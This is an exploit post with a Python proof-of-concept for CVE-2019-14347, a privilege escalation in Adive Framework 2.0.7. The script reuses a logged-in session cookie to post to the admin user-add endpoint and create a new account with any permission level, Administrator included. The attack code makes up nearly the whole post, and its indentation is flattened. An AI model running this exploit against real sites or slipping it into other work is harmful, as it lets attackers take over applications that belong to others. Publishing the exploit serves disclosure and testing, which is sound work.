Share
# Exploit Title: Adive Framework 2.0.7 - Privilege Escalation  
# Date: 2019-08-02  
# Exploit Author: Pablo Santiago  
# Vendor Homepage: https://www.adive.es/  
# Software Link: https://github.com/ferdinandmartin/adive-php7  
# Version: 2.0.7  
# Tested on: Windows 10  
# CVE : CVE-2019-14347  
  
#Exploit  
  
import requests  
import sys  
  
session = requests.Session()  
  
http_proxy = "http://127.0.0.1:8080"  
https_proxy = "https://127.0.0.1:8080"  
  
proxyDict = {  
"http" : http_proxy,  
"https" : https_proxy  
}  
print('[*****************************************]')  
print('[ BYPASSING Adive Framework Version.2.0.5 ]')  
print('[*****************************************]''\n')  
  
  
  
print('[+]Login with the correct credentials:' '\n')  
  
user = input('[+]user:')  
password = input('[+]password:')  
print('\n')  
  
url = 'http://localhost/adive/admin/login'  
values = {'user': user,  
'password': password,  
}  
  
r = session.post(url, data=values, proxies=proxyDict)  
cookie = session.cookies.get_dict()['PHPSESSID']  
  
print('Your session cookie is:'+ cookie +'\n')  
  
  
host = sys.argv[1]  
print('Create the new user:')  
userName = input('[+]User:')  
userUsername = input('[+]UserName:')  
password = input('[+]Password:')  
password2 = input('[+]Confirm Password:')  
print('The possibles permission are: 1: Administrator, 2: Developer, 3:Editor')  
permission = input('[+]permission:')  
  
if (password == password2):  
#configure proxy burp  
  
#hacer el request para la creacion de usuario  
data = {  
'userName':userName,  
'userUsername':userUsername,  
'pass':password,  
'cpass':password2,  
'permission':permission,  
  
}  
  
headers= {  
'Cookie': 'PHPSESSID='+cookie  
}  
  
request = session.post(host+'/adive/admin/user/add', data=data,  
headers=headers, proxies=proxyDict)  
print('+--------------------------------------------------+')  
  
else:  
print ('Passwords dont match!!!')  
  
#PoC  
https://imgur.com/dUgLYi6  
https://hackpuntes.com/wp-content/uploads/2019/08/ex.gif